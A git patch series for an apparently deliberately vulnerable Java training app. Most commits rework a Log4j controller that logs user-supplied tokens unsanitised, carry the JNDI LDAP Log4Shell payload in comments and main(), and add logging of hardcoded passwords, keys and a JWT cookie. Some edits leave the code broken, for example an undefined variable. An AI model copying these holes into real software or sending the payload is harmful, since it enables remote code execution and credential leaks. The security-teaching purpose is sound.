From 9465a6abce16704871fffee62bd8f3cf3ef38cd8 Mon Sep 17 00:00:00 2001 From: wangwangping <49153254+wangwangping@users.noreply.github.com> Date: Fri, 29 Nov 2024 17:28:05 +0800 Subject: [PATCH 01/19] Fix code scanning alert no. 86: Server-side request forgery Co-authored-by: Copilot Autofix powered by AI <62310815+github-advanced-security[bot]@users.noreply.github.com> --- src/main/java/org/joychou/controller/SSRF.java | 2 ++ src/main/java/org/joychou/util/HttpUtils.java | 16 ++++++++++++++++ 2 files changed, 18 insertions(+) diff --git a/src/main/java/org/joychou/controller/SSRF.java b/src/main/java/org/joychou/controller/SSRF.java index f28b8b91..effc41e8 100644 --- a/src/main/java/org/joychou/controller/SSRF.java +++ b/src/main/java/org/joychou/controller/SSRF.java @@ -1,4 +1,6 @@ package org.joychou.controller; +import java.util.Arrays; +import java.util.List; import cn.hutool.http.HttpUtil; import org.joychou.security.SecurityUtil; diff --git a/src/main/java/org/joychou/util/HttpUtils.java b/src/main/java/org/joychou/util/HttpUtils.java index c1eac95c..4d7ab515 100644 --- a/src/main/java/org/joychou/util/HttpUtils.java +++ b/src/main/java/org/joychou/util/HttpUtils.java @@ -32,6 +32,19 @@ * @author JoyChou 2020-04-06 */ public class HttpUtils { + private static final List ALLOWED_URLS = Arrays.asList( + "http://example.com", + "http://another-allowed-url.com" + ); + + private static boolean isValidUrl(String url) { + try { + URI uri = new URI(url); + return ALLOWED_URLS.contains(uri.getScheme() + "://" + uri.getHost()); + } catch (URISyntaxException e) { + return false; + } + } private final static Logger logger = LoggerFactory.getLogger(HttpUtils.class); @@ -203,6 +216,9 @@ public static void IOUtils(String url) { public static String HttpAsyncClients(String url) { + if (!isValidUrl(url)) { + return "Invalid URL"; + } CloseableHttpAsyncClient httpclient = HttpAsyncClients.createDefault(); try { httpclient.start(); From 84eedf99c51a38e50975d96cc590409d18007351 Mon Sep 17 00:00:00 2001 From: wangwangping <49153254+wangwangping@users.noreply.github.com> Date: Tue, 14 Jan 2025 10:38:16 +0800 Subject: [PATCH 02/19] Update Log4j.java --- src/main/java/org/joychou/controller/Log4j.java | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/main/java/org/joychou/controller/Log4j.java b/src/main/java/org/joychou/controller/Log4j.java index b2ea4060..7a8fd7f2 100644 --- a/src/main/java/org/joychou/controller/Log4j.java +++ b/src/main/java/org/joychou/controller/Log4j.java @@ -17,7 +17,7 @@ public class Log4j { */ @RequestMapping(value = "/log4j") public String log4j(String token) { - logger.error(token); + logger.error("token: {}", token); return token; } From 8f8a5b9507382e8f4fe8eecf6e43215b035dc00b Mon Sep 17 00:00:00 2001 From: wangwangping <49153254+wangwangping@users.noreply.github.com> Date: Wed, 26 Feb 2025 14:51:28 +0800 Subject: [PATCH 03/19] Update Log4j.java --- src/main/java/org/joychou/controller/Log4j.java | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/src/main/java/org/joychou/controller/Log4j.java b/src/main/java/org/joychou/controller/Log4j.java index 7a8fd7f2..e107a008 100644 --- a/src/main/java/org/joychou/controller/Log4j.java +++ b/src/main/java/org/joychou/controller/Log4j.java @@ -17,7 +17,11 @@ public class Log4j { */ @RequestMapping(value = "/log4j") public String log4j(String token) { - logger.error("token: {}", token); + HashMap params = new HashMap(); + params.put("Authoriztion", token); + params.put("Content-Type", "application/json"); + params.put("param", "error/fatal/off"); + logger.error("request params is: {}", JSON.toJSONString(params)); return token; } From 89c131c45295318d37c0d817bf0f08e997d7f3f0 Mon Sep 17 00:00:00 2001 From: wangwangping <49153254+wangwangping@users.noreply.github.com> Date: Wed, 26 Feb 2025 15:56:35 +0800 Subject: [PATCH 04/19] Update Log4j.java --- src/main/java/org/joychou/controller/Log4j.java | 6 +----- 1 file changed, 1 insertion(+), 5 deletions(-) diff --git a/src/main/java/org/joychou/controller/Log4j.java b/src/main/java/org/joychou/controller/Log4j.java index e107a008..9f2847c3 100644 --- a/src/main/java/org/joychou/controller/Log4j.java +++ b/src/main/java/org/joychou/controller/Log4j.java @@ -17,11 +17,7 @@ public class Log4j { */ @RequestMapping(value = "/log4j") public String log4j(String token) { - HashMap params = new HashMap(); - params.put("Authoriztion", token); - params.put("Content-Type", "application/json"); - params.put("param", "error/fatal/off"); - logger.error("request params is: {}", JSON.toJSONString(params)); + logger.error("token is: {}", NormalizerUtil.replaceCRLF(token)); return token; } From 74d9bca710b127acd1b3f433df5d54c370782e1f Mon Sep 17 00:00:00 2001 From: wangwangping <49153254+wangwangping@users.noreply.github.com> Date: Wed, 26 Feb 2025 16:17:02 +0800 Subject: [PATCH 05/19] Update Log4j.java --- src/main/java/org/joychou/controller/Log4j.java | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/main/java/org/joychou/controller/Log4j.java b/src/main/java/org/joychou/controller/Log4j.java index 9f2847c3..89f811ac 100644 --- a/src/main/java/org/joychou/controller/Log4j.java +++ b/src/main/java/org/joychou/controller/Log4j.java @@ -17,7 +17,7 @@ public class Log4j { */ @RequestMapping(value = "/log4j") public String log4j(String token) { - logger.error("token is: {}", NormalizerUtil.replaceCRLF(token)); + logger.error("token is: {}", token); return token; } From 60a927aa951b295d5cd3b392601f90c3bc63a301 Mon Sep 17 00:00:00 2001 From: wangwangping <49153254+wangwangping@users.noreply.github.com> Date: Fri, 28 Feb 2025 17:59:35 +0800 Subject: [PATCH 06/19] Update Log4j.java --- src/main/java/org/joychou/controller/Log4j.java | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/src/main/java/org/joychou/controller/Log4j.java b/src/main/java/org/joychou/controller/Log4j.java index 89f811ac..d918274a 100644 --- a/src/main/java/org/joychou/controller/Log4j.java +++ b/src/main/java/org/joychou/controller/Log4j.java @@ -16,8 +16,8 @@ public class Log4j { * Fix: Update log4j to lastet version. */ @RequestMapping(value = "/log4j") - public String log4j(String token) { - logger.error("token is: {}", token); + public String log4j(String token, Authorization authorization) { + logger.error("token is: {}, authorization is: {}", token, authorization); return token; } From fde80237d9b4ee6e325086a4671f495397061d9a Mon Sep 17 00:00:00 2001 From: wangwangping <49153254+wangwangping@users.noreply.github.com> Date: Fri, 28 Feb 2025 18:07:35 +0800 Subject: [PATCH 07/19] Update Log4j.java --- src/main/java/org/joychou/controller/Log4j.java | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/src/main/java/org/joychou/controller/Log4j.java b/src/main/java/org/joychou/controller/Log4j.java index d918274a..a9131709 100644 --- a/src/main/java/org/joychou/controller/Log4j.java +++ b/src/main/java/org/joychou/controller/Log4j.java @@ -17,7 +17,8 @@ public class Log4j { */ @RequestMapping(value = "/log4j") public String log4j(String token, Authorization authorization) { - logger.error("token is: {}, authorization is: {}", token, authorization); + execute(token, authorization); + logger.error("token is: " + token + "authorization is: " + JSONUtil.toJsonStr(authorization)); return token; } From 517dda397bc31bfd820e034824eef63f8b498901 Mon Sep 17 00:00:00 2001 From: wangwangping <49153254+wangwangping@users.noreply.github.com> Date: Fri, 28 Feb 2025 18:12:25 +0800 Subject: [PATCH 08/19] Update Log4j.java --- src/main/java/org/joychou/controller/Log4j.java | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/main/java/org/joychou/controller/Log4j.java b/src/main/java/org/joychou/controller/Log4j.java index a9131709..ff325573 100644 --- a/src/main/java/org/joychou/controller/Log4j.java +++ b/src/main/java/org/joychou/controller/Log4j.java @@ -18,7 +18,7 @@ public class Log4j { @RequestMapping(value = "/log4j") public String log4j(String token, Authorization authorization) { execute(token, authorization); - logger.error("token is: " + token + "authorization is: " + JSONUtil.toJsonStr(authorization)); + logger.error("token is: {}, authorization is: {}", token, JSONUtil.toJsonStr(authorization)); return token; } From d734c90f22d1fd6804c641e3982e14732501319e Mon Sep 17 00:00:00 2001 From: wangwangping <49153254+wangwangping@users.noreply.github.com> Date: Fri, 28 Feb 2025 20:54:06 +0800 Subject: [PATCH 09/19] Update Log4j.java --- src/main/java/org/joychou/controller/Log4j.java | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) diff --git a/src/main/java/org/joychou/controller/Log4j.java b/src/main/java/org/joychou/controller/Log4j.java index ff325573..7daf859b 100644 --- a/src/main/java/org/joychou/controller/Log4j.java +++ b/src/main/java/org/joychou/controller/Log4j.java @@ -16,10 +16,9 @@ public class Log4j { * Fix: Update log4j to lastet version. */ @RequestMapping(value = "/log4j") - public String log4j(String token, Authorization authorization) { - execute(token, authorization); - logger.error("token is: {}, authorization is: {}", token, JSONUtil.toJsonStr(authorization)); - return token; + public String log4j(Authorization authorization) { + logger.error("authorization is: {}", authorization.toString()); + return authorization.toString(); } public static void main(String[] args) { From 2ef76b1d0f2db7c8a1894cc2e16789972cc5b108 Mon Sep 17 00:00:00 2001 From: wangwangping <49153254+wangwangping@users.noreply.github.com> Date: Tue, 4 Mar 2025 09:06:46 +0800 Subject: [PATCH 10/19] Update Log4j.java --- src/main/java/org/joychou/controller/Log4j.java | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/main/java/org/joychou/controller/Log4j.java b/src/main/java/org/joychou/controller/Log4j.java index 7daf859b..3c990743 100644 --- a/src/main/java/org/joychou/controller/Log4j.java +++ b/src/main/java/org/joychou/controller/Log4j.java @@ -17,7 +17,7 @@ public class Log4j { */ @RequestMapping(value = "/log4j") public String log4j(Authorization authorization) { - logger.error("authorization is: {}", authorization.toString()); + logger.error("authorization is: {}", authorization); return authorization.toString(); } From ffd85c3bdf45bf158f6354688e9c1fe3039a2bcc Mon Sep 17 00:00:00 2001 From: wangwangping <49153254+wangwangping@users.noreply.github.com> Date: Tue, 4 Mar 2025 09:12:48 +0800 Subject: [PATCH 11/19] Update Log4j.java --- src/main/java/org/joychou/controller/Log4j.java | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/src/main/java/org/joychou/controller/Log4j.java b/src/main/java/org/joychou/controller/Log4j.java index 3c990743..b2ea4060 100644 --- a/src/main/java/org/joychou/controller/Log4j.java +++ b/src/main/java/org/joychou/controller/Log4j.java @@ -16,9 +16,9 @@ public class Log4j { * Fix: Update log4j to lastet version. */ @RequestMapping(value = "/log4j") - public String log4j(Authorization authorization) { - logger.error("authorization is: {}", authorization); - return authorization.toString(); + public String log4j(String token) { + logger.error(token); + return token; } public static void main(String[] args) { From bac386d46e3a5b929430e4932c76900d96dfed86 Mon Sep 17 00:00:00 2001 From: wangwangping <49153254+wangwangping@users.noreply.github.com> Date: Tue, 4 Mar 2025 09:24:01 +0800 Subject: [PATCH 12/19] Update Log4j.java --- src/main/java/org/joychou/controller/Log4j.java | 11 +++++++++-- 1 file changed, 9 insertions(+), 2 deletions(-) diff --git a/src/main/java/org/joychou/controller/Log4j.java b/src/main/java/org/joychou/controller/Log4j.java index b2ea4060..f246b904 100644 --- a/src/main/java/org/joychou/controller/Log4j.java +++ b/src/main/java/org/joychou/controller/Log4j.java @@ -17,13 +17,20 @@ public class Log4j { */ @RequestMapping(value = "/log4j") public String log4j(String token) { - logger.error(token); + logger.info("token: {}", token); + String password = "Pass@0rd"; + logger.info("User password is "+password); + String privateKey = "parivate"; + logger.info("paramaters is {}", new Object[]{privateKey}); + if (StringUtils.isBlank(privateKey)) { + logger.info("something wrong, token: {}, privateKey: {}", token, privateKey); + } return token; } public static void main(String[] args) { String poc = "${jndi:ldap://127.0.0.1:1389/0iun75}"; - logger.error(poc); + logger.info(poc); } } From 16ac1623d40486a5c28f6a24cdb75a6a6cbab7cb Mon Sep 17 00:00:00 2001 From: wangwangping <49153254+wangwangping@users.noreply.github.com> Date: Tue, 4 Mar 2025 09:33:45 +0800 Subject: [PATCH 13/19] Update Log4j.java --- src/main/java/org/joychou/controller/Log4j.java | 8 +------- 1 file changed, 1 insertion(+), 7 deletions(-) diff --git a/src/main/java/org/joychou/controller/Log4j.java b/src/main/java/org/joychou/controller/Log4j.java index f246b904..c1c5063c 100644 --- a/src/main/java/org/joychou/controller/Log4j.java +++ b/src/main/java/org/joychou/controller/Log4j.java @@ -17,14 +17,8 @@ public class Log4j { */ @RequestMapping(value = "/log4j") public String log4j(String token) { - logger.info("token: {}", token); - String password = "Pass@0rd"; - logger.info("User password is "+password); String privateKey = "parivate"; - logger.info("paramaters is {}", new Object[]{privateKey}); - if (StringUtils.isBlank(privateKey)) { - logger.info("something wrong, token: {}, privateKey: {}", token, privateKey); - } + logger.error("something wrong, token: {}, privateKey: {}", token, privateKey); return token; } From 6ec4f5bd867c0704ded8153fb758a77ae1136bc4 Mon Sep 17 00:00:00 2001 From: wangwangping <49153254+wangwangping@users.noreply.github.com> Date: Tue, 4 Mar 2025 09:41:18 +0800 Subject: [PATCH 14/19] Update Log4j.java --- .../java/org/joychou/controller/Log4j.java | 51 +++++++++++++++++++ 1 file changed, 51 insertions(+) diff --git a/src/main/java/org/joychou/controller/Log4j.java b/src/main/java/org/joychou/controller/Log4j.java index c1c5063c..38a90358 100644 --- a/src/main/java/org/joychou/controller/Log4j.java +++ b/src/main/java/org/joychou/controller/Log4j.java @@ -25,6 +25,57 @@ public String log4j(String token) { public static void main(String[] args) { String poc = "${jndi:ldap://127.0.0.1:1389/0iun75}"; logger.info(poc); + String token = "token"; + String privateKey = "parivate"; + logger.error("something wrong, token: {}, privateKey: {}", token, privateKey); + } + + /** + * http://localhost:8080/log4j?token=${jndi:ldap://127.0.0.1:1389/0iun75} + * Default: error/fatal/off + * Fix: Update log4j to lastet version. + */ + @RequestMapping(value = "/log4j1") + public String log4j1(String token) { + String privateKey = "parivate"; + logger.error("something wrong, token: {}, privateKey: {}", token, privateKey); + return token; + } + + + /** + * http://localhost:8080/log4j?token=${jndi:ldap://127.0.0.1:1389/0iun75} + * Default: error/fatal/off + * Fix: Update log4j to lastet version. + */ + @RequestMapping(value = "/log4j2") + public String log4j2(String token) { + String privateKey = "parivate"; + logger.error("something wrong, token: {}, privateKey: {}", token, privateKey); + return token; + } + + /** + * http://localhost:8080/log4j?token=${jndi:ldap://127.0.0.1:1389/0iun75} + * Default: error/fatal/off + * Fix: Update log4j to lastet version. + */ + @RequestMapping(value = "/log4j3") + public String log4j3(String token) { + String privateKey = "parivate"; + logger.error("something wrong, token: {}, privateKey: {}", token, privateKey); + return token; } + /** + * http://localhost:8080/log4j?token=${jndi:ldap://127.0.0.1:1389/0iun75} + * Default: error/fatal/off + * Fix: Update log4j to lastet version. + */ + @RequestMapping(value = "/log4j4") + public String log4j4(String token) { + String param = "param"; + logger.error("something wrong, token: {}, param: {}", token, param); + return token; + } } From 5341f4e5c21d6b84e9033975defa8d9e64ba9f4d Mon Sep 17 00:00:00 2001 From: wangwangping <49153254+wangwangping@users.noreply.github.com> Date: Tue, 4 Mar 2025 10:06:25 +0800 Subject: [PATCH 15/19] Update Log4j.java --- .../java/org/joychou/controller/Log4j.java | 53 +------------------ 1 file changed, 2 insertions(+), 51 deletions(-) diff --git a/src/main/java/org/joychou/controller/Log4j.java b/src/main/java/org/joychou/controller/Log4j.java index 38a90358..e9341947 100644 --- a/src/main/java/org/joychou/controller/Log4j.java +++ b/src/main/java/org/joychou/controller/Log4j.java @@ -18,64 +18,15 @@ public class Log4j { @RequestMapping(value = "/log4j") public String log4j(String token) { String privateKey = "parivate"; - logger.error("something wrong, token: {}, privateKey: {}", token, privateKey); + logger.info("token: {}, privateKey: {}", token, privateKey); return token; } public static void main(String[] args) { String poc = "${jndi:ldap://127.0.0.1:1389/0iun75}"; logger.info(poc); - String token = "token"; String privateKey = "parivate"; - logger.error("something wrong, token: {}, privateKey: {}", token, privateKey); + logger.error("something went wrong, token: {}, privateKey: {}", token, privateKey); } - /** - * http://localhost:8080/log4j?token=${jndi:ldap://127.0.0.1:1389/0iun75} - * Default: error/fatal/off - * Fix: Update log4j to lastet version. - */ - @RequestMapping(value = "/log4j1") - public String log4j1(String token) { - String privateKey = "parivate"; - logger.error("something wrong, token: {}, privateKey: {}", token, privateKey); - return token; - } - - - /** - * http://localhost:8080/log4j?token=${jndi:ldap://127.0.0.1:1389/0iun75} - * Default: error/fatal/off - * Fix: Update log4j to lastet version. - */ - @RequestMapping(value = "/log4j2") - public String log4j2(String token) { - String privateKey = "parivate"; - logger.error("something wrong, token: {}, privateKey: {}", token, privateKey); - return token; - } - - /** - * http://localhost:8080/log4j?token=${jndi:ldap://127.0.0.1:1389/0iun75} - * Default: error/fatal/off - * Fix: Update log4j to lastet version. - */ - @RequestMapping(value = "/log4j3") - public String log4j3(String token) { - String privateKey = "parivate"; - logger.error("something wrong, token: {}, privateKey: {}", token, privateKey); - return token; - } - - /** - * http://localhost:8080/log4j?token=${jndi:ldap://127.0.0.1:1389/0iun75} - * Default: error/fatal/off - * Fix: Update log4j to lastet version. - */ - @RequestMapping(value = "/log4j4") - public String log4j4(String token) { - String param = "param"; - logger.error("something wrong, token: {}, param: {}", token, param); - return token; - } } From 5cf88a2cb3256b57f18ec69d235c7732e685b41b Mon Sep 17 00:00:00 2001 From: wangwangping <49153254+wangwangping@users.noreply.github.com> Date: Tue, 4 Mar 2025 10:14:43 +0800 Subject: [PATCH 16/19] Update Log4j.java --- src/main/java/org/joychou/controller/Log4j.java | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/src/main/java/org/joychou/controller/Log4j.java b/src/main/java/org/joychou/controller/Log4j.java index e9341947..577f2efd 100644 --- a/src/main/java/org/joychou/controller/Log4j.java +++ b/src/main/java/org/joychou/controller/Log4j.java @@ -17,8 +17,9 @@ public class Log4j { */ @RequestMapping(value = "/log4j") public String log4j(String token) { + String result = getResponse(token); String privateKey = "parivate"; - logger.info("token: {}, privateKey: {}", token, privateKey); + logger.info("token: {}, privateKey: {}, result: {}", token, privateKey, result); return token; } @@ -26,7 +27,9 @@ public static void main(String[] args) { String poc = "${jndi:ldap://127.0.0.1:1389/0iun75}"; logger.info(poc); String privateKey = "parivate"; - logger.error("something went wrong, token: {}, privateKey: {}", token, privateKey); + if(StringUtils.isNotBlank(privateKey)) { + logger.error("token: {}, privateKey: {}", token, privateKey); + } } } From 1eed289b58ef3d73b8edf97b3b420e2a744b90e0 Mon Sep 17 00:00:00 2001 From: wangwangping <49153254+wangwangping@users.noreply.github.com> Date: Tue, 4 Mar 2025 10:15:57 +0800 Subject: [PATCH 17/19] Update Jwt.java --- src/main/java/org/joychou/controller/Jwt.java | 1 + 1 file changed, 1 insertion(+) diff --git a/src/main/java/org/joychou/controller/Jwt.java b/src/main/java/org/joychou/controller/Jwt.java index f3e4c126..12bd9d6f 100644 --- a/src/main/java/org/joychou/controller/Jwt.java +++ b/src/main/java/org/joychou/controller/Jwt.java @@ -43,6 +43,7 @@ public String createToken(HttpServletResponse response, HttpServletRequest reque cookie.setPath("/"); cookie.setSecure(true); response.addCookie(cookie); + logger.info("cookie is: {}", cookie); return "Add jwt token cookie successfully. Cookie name is USER_COOKIE"; } From a3371646e1fd9a3649385b66a2bf29f6e5df4831 Mon Sep 17 00:00:00 2001 From: wangwangping <49153254+wangwangping@users.noreply.github.com> Date: Tue, 4 Mar 2025 10:27:47 +0800 Subject: [PATCH 18/19] Create Log4j2 --- src/main/java/org/joychou/controller/Log4j2 | 36 +++++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 src/main/java/org/joychou/controller/Log4j2 diff --git a/src/main/java/org/joychou/controller/Log4j2 b/src/main/java/org/joychou/controller/Log4j2 new file mode 100644 index 00000000..2dcf1824 --- /dev/null +++ b/src/main/java/org/joychou/controller/Log4j2 @@ -0,0 +1,36 @@ + +package org.joychou.controller; + +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; +import org.springframework.web.bind.annotation.RequestMapping; +import org.springframework.web.bind.annotation.RestController; + +@RestController +public class Log4j2 { + + private static final Logger logger = LogManager.getLogger("Log4j2"); + + /** + * http://localhost:8080/log4j?token=${jndi:ldap://127.0.0.1:1389/0iun75} + * Default: error/fatal/off + * Fix: Update log4j to lastet version. + */ + @RequestMapping(value = "/log4j") + public String log4j(String token) { + String password = "Pass@0rd"; + logger.info("User password is " + password); + String privateKey = "parivate"; + logger.info("paramaters is {}", new Object[]{privateKey}); + if(StringUtils.isNotBlank(privateKey)) { + logger.error("something wrong, token: {}, privateKey: {}", token, privateKey); + } + return token; + } + + public static void main(String[] args) { + String poc = "${jndi:ldap://127.0.0.1:1389/0iun75}"; + logger.info(poc); + } + +} From e97817488bfd579825e947beae34b26e56989e11 Mon Sep 17 00:00:00 2001 From: wangwangping <49153254+wangwangping@users.noreply.github.com> Date: Tue, 4 Mar 2025 10:33:21 +0800 Subject: [PATCH 19/19] Rename Log4j2 to Log4j2.java --- src/main/java/org/joychou/controller/{Log4j2 => Log4j2.java} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename src/main/java/org/joychou/controller/{Log4j2 => Log4j2.java} (100%) diff --git a/src/main/java/org/joychou/controller/Log4j2 b/src/main/java/org/joychou/controller/Log4j2.java similarity index 100% rename from src/main/java/org/joychou/controller/Log4j2 rename to src/main/java/org/joychou/controller/Log4j2.java